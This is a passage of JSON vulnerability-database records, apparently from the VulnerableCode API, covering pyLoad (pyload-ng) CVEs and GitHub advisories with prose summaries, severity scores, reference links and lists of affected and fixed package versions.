issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41133","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13711","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41133"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41133","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41133"},{"reference_url":"https://github.com/pyload/pyload/commit/e95804fb0d06cbb07d2ba380fc494d9ff89b68c1","reference_id":"e95804fb0d06cbb07d2ba380fc494d9ff89b68c1","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":
""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T18:31:55Z/"}],"url":"https://github.com/pyload/pyload/commit/e95804fb0d06cbb07d2ba380fc494d9ff89b68c1"},{"reference_url":"https://github.com/advisories/GHSA-66hx-chf7-3332","reference_id":"GHSA-66hx-chf7-3332","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-66hx-chf7-3332"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-66hx-chf7-3332","reference_id":"GHSA-66hx-chf7-3332","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T18:31:55Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-66hx-chf7-3332"}],"fixed_packages":[],"aliases":["CVE-2026-41133","GHSA-66hx-chf7-3332"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kjru-xrvh-1bad"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48570?format=json","vulnerability_id":"VCID-ktv2-2ay9-g7be","summary":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. 
This issue has been patched in version 0.5.0b3.dev77.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-21644","reference_id":"","reference_type":"","scores":[{"value":"0.89284","scoring_system":"epss","scoring_elements":"0.9956","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-21644"},{"reference_url":"https://github.com/pyload/pyload/commit/bb22063a875ffeca357aaf6e2edcd09705688c40","reference_id":"bb22063a875ffeca357aaf6e2edcd09705688c40","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-01-09T19:55:57Z/"}],"url":"https://github.com/pyload/pyload/commit/bb22063a875ffeca357aaf6e2edcd09705688c40"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-21644","reference_id":"CVE-2024-21644","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-21644"},{"reference_url":"https://github.com/advisories/GHSA-mqpq-2p68-46fv","reference_id":"GHSA-mqpq-2p68-46fv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mqpq-2p68-46fv"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-mqpq-2p68-46fv","reference_id":"GHSA-mqpq-2p68-46fv","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"v
alue":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-01-09T19:55:57Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-mqpq-2p68-46fv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/28288?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev77","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rh3z-nqp8-eqfa"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-ucfj-9bwk-pbd8"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-x9sy-hcqs-pke5"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev77"}],"aliases":["CVE-2024-21644","GHSA-mqpq-2p68-46fv"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ktv2-2ay9-g
7be"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84141?format=json","vulnerability_id":"VCID-kz5g-9as8-g7aw","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the /json/package_order, /json/link_order, and /json/abort_link WebUI JSON endpoints enforce weaker permissions than the core API methods they invoke. This allows authenticated low-privileged users to execute MODIFY operations that should be denied by pyLoad's own permission model. This vulnerability is fixed in 0.5.0b3.dev97.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40071","reference_id":"","reference_type":"","scores":[{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.12248","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40071"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40071","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40071"},{"reference_url":"https://github.com/advisories/GHSA-rfgh-63mg-8pwm","reference_id":"GHSA-rfgh-63mg-8pwm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rfgh-63mg-8pwm"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm","reference_id":"GHSA-rfgh-63mg-8pwm","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T
:P/P:M/B:A/M:M/D:T/2026-04-10T14:09:08Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm"}],"fixed_packages":[],"aliases":["CVE-2026-40071","GHSA-rfgh-63mg-8pwm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kz5g-9as8-g7aw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359876?format=json","vulnerability_id":"VCID-nukv-bju1-auht","summary":"pyLoad's Session Not Invalidated After Permission Changes\n### Summary\nThe `pyload` application does not properly invalidate or modify sessions upon changes made to a user's permissions.\n\n### Details\nWhenever an administrator changes the permissions a specific account has, they do not expect that account to still be able to access data that their new permissions do not allow. This is not the case for the `pyload` application, as a user with a valid session can still perform the actions.\n\n### PoC\nTake a user with all the permissions, as shown below.\n![image](https://user-images.githubusercontent.com/44903767/294956335-0e4da84f-bf9a-42c8-87f1-f5ff35967c63.png)\n\nWe now log in as this user.\n![image](https://user-images.githubusercontent.com/44903767/294956539-ac6805fe-957d-4289-8ca9-2f3b6b2878a3.png)\n\nLet us now take away all the permissions.\n![image](https://user-images.githubusercontent.com/44903767/294956689-757e6e08-03fd-42eb-b4a5-1ceefa6c24ed.png)\n\nThe logged in session can still be used to access everything in the application.\n![image](https://user-images.githubusercontent.com/44903767/294956943-fa0f23c0-a28c-4eed-89d6-1cc074feda6d.png)\n\n### Impact\nShould permissions be taken away, then the user is expected not to be able to execute the actions belonging to those permissions 
anymore.","references":[{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-fj52-5g4h-gmq8","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-fj52-5g4h-gmq8"},{"reference_url":"https://github.com/advisories/GHSA-fj52-5g4h-gmq8","reference_id":"GHSA-fj52-5g4h-gmq8","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fj52-5g4h-gmq8"}],"fixed_packages":[],"aliases":["GHSA-fj52-5g4h-gmq8"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nukv-bju1-auht"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/87937?format=json","vulnerability_id":"VCID-r5mf-vf91-nfgs","summary":"pyLoad is the free and open-source Download Manager written in pure Python. In versions 0.5.0b3.dev89 and below, there is an opportunity for path traversal in pyLoad-ng CNL Blueprint via package parameter, allowing Arbitrary File Write which leads to Remote Code Execution (RCE). The addcrypted endpoint in pyload-ng suffers from an unsafe path construction vulnerability, allowing unauthenticated attackers to write arbitrary files outside the designated storage directory. This can be abused to overwrite critical system files, including cron jobs and systemd services, leading to privilege escalation and remote code execution as root. 
This issue is fixed in version 0.5.0b3.dev90.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54802","reference_id":"","reference_type":"","scores":[{"value":"0.02893","scoring_system":"epss","scoring_elements":"0.86633","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54802"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54802","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54802"},{"reference_url":"https://github.com/pyload/pyload/pull/4596","reference_id":"4596","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-05T14:29:40Z/"}],"url":"https://github.com/pyload/pyload/pull/4596"},{"reference_url":"https://github.com/pyload/pyload/commit/70a44fe02c03bce92337b5d370d2a45caa4de3d4","reference_id":"70a44fe02c03bce92337b5d370d2a45caa4de3d4","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-05T14:29:40Z/"}],"url":"https://github.com/pyload/pyload/commit/70a44fe02c03bce92337b5d370d2a45caa4de3d4"},{"reference_url":"https://github.com/advisories/GHSA-48rp-jc79-2264","reference_id":"GHSA-48rp-jc79-2264","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-48rp-jc79-2264"},{"reference_url":"htt
ps://github.com/pyload/pyload/security/advisories/GHSA-48rp-jc79-2264","reference_id":"GHSA-48rp-jc79-2264","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-05T14:29:40Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-48rp-jc79-2264"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/91196?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev90","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev90"}],"aliases":["CVE-2025-54802","GHSA-48rp-jc79-2264"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r5mf-vf91-nfgs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/62281?format=json","vulnerability_id":"VCID-
rh3z-nqp8-eqfa","summary":"pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-22416","reference_id":"","reference_type":"","scores":[{"value":"0.05898","scoring_system":"epss","scoring_elements":"0.90807","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-22416"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml"},{"reference_url":"https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e","reference_id":"1374c824271cb7e927740664d06d2e577624ca3e","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC
:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-18T01:21:47Z/"}],"url":"https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e"},{"reference_url":"https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc","reference_id":"c7cdc18ad9134a75222974b39e8b427c4af845fc","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-18T01:21:47Z/"}],"url":"https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-22416","reference_id":"CVE-2024-22416","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-22416"},{"reference_url":"https://github.com/advisories/GHSA-pgpj-v85q-h5fm","reference_id":"GHSA-pgpj-v85q-h5fm","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisori
es/GHSA-pgpj-v85q-h5fm"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm","reference_id":"GHSA-pgpj-v85q-h5fm","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-18T01:21:47Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/28454?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev78","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"
VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-ucfj-9bwk-pbd8"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev78"}],"aliases":["CVE-2024-22416","GHSA-pgpj-v85q-h5fm","PYSEC-2024-17"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rh3z-nqp8-eqfa"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84256?format=json","vulnerability_id":"VCID-rynb-u84j-7khx","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev98, the set_session_cookie_secure before_request handler in src/pyload/webui/app/__init__.py reads the X-Forwarded-Proto header from any HTTP request without validating that the request originates from a trusted proxy, then mutates the global Flask configuration SESSION_COOKIE_SECURE on every request. Because pyLoad uses the multi-threaded Cheroot WSGI server (request_queue_size=512), this creates a race condition where an attacker's request can influence the Secure flag on other users' session cookies — either downgrading cookie security behind a TLS proxy or causing a session denial-of-service on plain HTTP deployments. 
This vulnerability is fixed in 0.5.0b3.dev98.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40594","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01346","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40594"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-125.yaml","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-125.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40594","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40594"},{"reference_url":"https://github.com/advisories/GHSA-mp82-fmj6-f22v","reference_id":"GHSA-mp82-fmj6-f22v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mp82-fmj6-f22v"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-mp82-fmj6-f22v","reference_id":"GHSA-mp82-fmj6-f22v","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T18:01:27Z/"}],"url":"https://github.com/pyl
oad/pyload/security/advisories/GHSA-mp82-fmj6-f22v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/81710?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev69","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d2gv-3uu7-gudh"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-ktv2-2ay9-g7be"